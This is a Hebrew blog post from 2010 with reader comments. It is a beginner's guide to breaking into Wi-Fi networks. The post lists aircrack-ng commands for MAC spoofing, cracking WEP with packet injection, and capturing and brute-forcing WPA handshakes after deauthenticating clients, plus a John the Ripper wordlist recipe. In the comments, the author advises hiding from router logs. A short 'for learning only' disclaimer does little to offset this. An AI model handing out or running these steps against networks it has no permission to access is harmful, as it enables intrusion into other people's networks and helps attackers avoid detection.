אז איך פורצים רשת אלחוטית?
מאת גיא מזרחי ~ 25 בינואר, 2010. בקטגוריות: כללי.כיוון שאני עדיין מקבל את השאלה הזאת על בסיס קבוע.. אני אכתוב:
נתחיל בזה שהעניין כמובן בלתי חוקי אלא אם כן אתם מקבלים את רשותו של בעל הרשת ולכן כל המידע פה למטרות למידה.
כרטיס הרשת המומלץ הוא כרטיס מבוסס Atheros או Realtek, במקרה הזה אני משתמש ב-RT8187 והוא מעולה.
ניתן להשיג כרטיס כזה ב-DealExtreame פה:
http://www.dealextreme.com/details.dx/sku.20646~r.93695647
אם אתם רוצים משהו איכותי יותר אפשר להשקיע בכרטיס ALFA שניתן להשיג ב-EBAY בכ-50$.
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger –mac 00:11:22:33:44:55 wlan0
כל זה כדי להחליף את ה-MAC של כרטיס הרשת שלכם. לפריצה עצמה:
1. פריצת WEP עם Clients:
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
aircrack-ng -b (bssid) file name-01.cap
2. פריצה של WPA עם Clients ועם מילון מוכן:
airmon-ng start wlan0
airodump-ng mon0
airodump-ng mon0 –channel (channel) –bssid (bssid) -w /tmp/wpa
aireplay-ng -0 1 -a (same-bssid) -c (mac) mon0
aircrack-ng -w wordlist.txt -b bssid /tmp/wpa*.cap
כמו שאתם מבינים, אנחנו צריכים מילון מוכן שיכיל בתוכו את המפתח.
יש הרבה מאוד בתים בארץ שהמפתח שלהם הוא מספר הטלפון או הסלולרי שלהם ולכן מילון שמכיל את כל הפרמוטציות של הספרות עד 10 תווים ייתן תוצאה לא רעה
למילון טוב יותר ניתן להשתמש ב-JOHN:
/pentest/passwords/jtr/john –stdout –incremental:all > wordlist.txt
שימו לב לעצור אותו כשהוא מגיע ל-10 תווים או כמה שרציתם להגיע..
מילון טוב (10 תווים של כל ה-ASCII) יכול להגיע למעל 200GB ככה שתדאגו שיש לכם מספיק מקום בשבילו.
יש פריצות מסובכות יותר שלא דורשות משתמש מחובר אבל למתחילים זה אמור להספיק 
25 בינואר, 2010 בשעה 8:21
[...] לראות איך עושים את זה? פריצת רשת אלחוטית [...]
25 בינואר, 2010 בשעה 8:55
בהחלט יכול להיות נחמד, תודה
לא הבנתי למה יש צורך להחליף את כרטיס הרשת ואת כתובת ה mac?
25 בינואר, 2010 בשעה 9:32
אתה לא רוצה להשאיר משהו בלוגים של הנתב, נכון?
25 בינואר, 2010 בשעה 15:30
מעניין…
אז איך בעצם ה-macchanger עובד? ומה עושה ה-airodump?
אגב, זה עובד גם בויסטה?
תודה
25 בינואר, 2010 בשעה 17:58
אז זה רק בשביל להסתיר את עצמי?
ברוב המקרים לא ממש יפריע לי להשאיר לוגים בנתב
26 בינואר, 2010 בשעה 1:54
גיא לא צריך להעביר את הכרטיס למצב monitor לפני זה?
26 בינואר, 2010 בשעה 14:47
האם זה כרטיס טוב?
Atheros AR5007EG Wireless Network Adapter
כי ניסיתי איתו כמה פעמים ולא הצלחתי
26 בינואר, 2010 בשעה 18:35
davido:
http://inportb.com/2008/07/27/madwifi-support-for-ar5007-ar2425-with-injection-aircrack/
אייל:
airmon-ng start יעביר את הכרטיס הנבחר לmonitor.
בן אור:
תתרגל לעבוד נכון. אתה לא רוצה להשאיר לוגים אם אתה יכול למנוע את זה.
ברק:
ויסטה? נו באמת..
אם תחפש בבלוג יש פוסט על שינוי MAC ב-WINDOWS..
26 בינואר, 2010 בשעה 19:46
הכתבה פה כבר מוכרת… מי שזה משמש אותו – בהצלחה
26 בינואר, 2010 בשעה 22:14
יש לציין שהבעיה המרכזית של המשתמש המתחיל היא לגרום לכרטיס הרשת שלו לעבוד ולהיות מסוגל להזריק תחת לינוקס, הפתרון הפשוט הוא לעבוד עם Backtrack שתדע לזהות את רוב כרטיסי הרשת הנורמלים ןמכילה את aircrack ומשפחתו באופן מובנה בצירוף קיזמיט כמובן.
27 בינואר, 2010 בשעה 0:19
[...] הפוסט במקור בבלוג Zull, יומנו של האקר [...]
27 בינואר, 2010 בשעה 11:16
גיא תודה רבה.
כבר חשבתי שאתה אולי בפנמה (:
27 בינואר, 2010 בשעה 15:44
מדריך סקידי משהו הייתי אומר …
27 בינואר, 2010 בשעה 18:08
[...] * איך פורצים רשת אלחוטית? [...]
27 בינואר, 2010 בשעה 19:16
אני לא מכיר כלום על פרוטוקולים של רשתות אלחוטיות.
האם יש קשר בין סיסמת הההתחברות לפענוח התעבורה של התווך בין שאר המחשבים לראוטר האלחוטי?
האם כשהאקר משיג את הסיסמא בדרך כזו או אחרת – הוא יוכל לראות מה שאר המשתמשים מבצעים?
27 בינואר, 2010 בשעה 22:22
וואלה
נחמד ללמוד.
אני הכרתי דרך אחרת, להפיל את הרשת האלחוטית, להעביר למוניטור ולהחזיר אותה:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
לקצר את זה לפקודה אחת אכן מייעל את העבודה.
28 בינואר, 2010 בשעה 11:53
"בן אור:
תתרגל לעבוד נכון. אתה לא רוצה להשאיר לוגים אם אתה יכול למנוע את זה."
גיא, אני רואה כאן סיוע לביצוע עבירות מחשב?
28 בינואר, 2010 בשעה 21:48
אני הצחלתי ללמוד את הנושא השנה, יש לי בעיה בצבירת #DATA
20 דקות חיכיתי ואספתי רק 500 IV'S
אני ניסיתי לפרוץ לעצמי (WEP 128BIT 5.5MB)
ולפי כמה חיפושים שעשיתי אני יכול לשלוח פאקטים דרך -2 במקום -3 אם אין קליינטים נכון?
29 בינואר, 2010 בשעה 10:34
גיא אני מכיר את הקישור שהבאת לי והוא לא עובד [לי לפחות]
אם מישהו מכיר מקום להוריד –תודה.
1 בפברואר, 2010 בשעה 1:04
שלום, ניסיתי להפעיל את הפקודה airmon-ng אך ללא הצלחה. הוא לא כותב לי כלום.
הבנתי שצריך להתקין את הדרייבר של הכרטיס רשת שלי. יש לי Atheros AR5007EG Wireless Network Adapter. מישהו הביא כאן למעלה את הדרייבר. ניסיתי להתקין אבל לא הצלחתי. הוא בכל זאת לא מצליח לאתר לי כלום.
כאשר אני רושם את הפקודה airmon-ng הוא מפעיל אותה אבל לא מראה לי שום רשת.
אשמח לעזרה.
4 בפברואר, 2010 בשעה 17:52
היי, תסלחו לי על הבורות,
* אך האם הפקודות שדיברת עליהם אילו פקודות שפשוט מורצות (למשל ב CMD)?
* איפה אפשר לקרוא על המשמעות המלאה של הפקודות? (כשאני מבצע פעולות הרצה אני רוצה להבין את המשמעות ולא להעתיק ממדריך).
* מאיפה אני מוריד את התוכנה (הclinet שדיברת עליו)?
מהתגובה שהגבת לברק אני מבין שזה מדרך שמיועד ללינוקס ולא לwindows?
*האם חוץ מ"מילון" או גניבה של הסיסמא שלי בעת ההקלדה – קיימות עוד דרכים שאתה מכיר?
(העניין שלי הוא האם אני משתמש בסיסמא כמו Npkmu,^75pzN#42, ולא יושב לי מישהו בתוך הרשת שעוזר לפריצה – האם אני נחשב די בטוח?).
*מדוע משנה הכרטיס רשת שלי לביצוע הפריצה? זה לא המחשב שמבצע את פעולת פיצוח ההצפנה?
**הגעתי לעמוד זה במטרה להבין קצת באבטחת המידע שלי עצמי דרך האתר של "איתן כספי", מבחינה עיצובית מפריע קצת הרקע הכחול של הכתובת "Zull" יומנו של האקר" – אבל מבחינה מקצועית בתור אחד שלא מהתחום נראה מאוד מקצועי.
אודה לתגובתכם,
רן.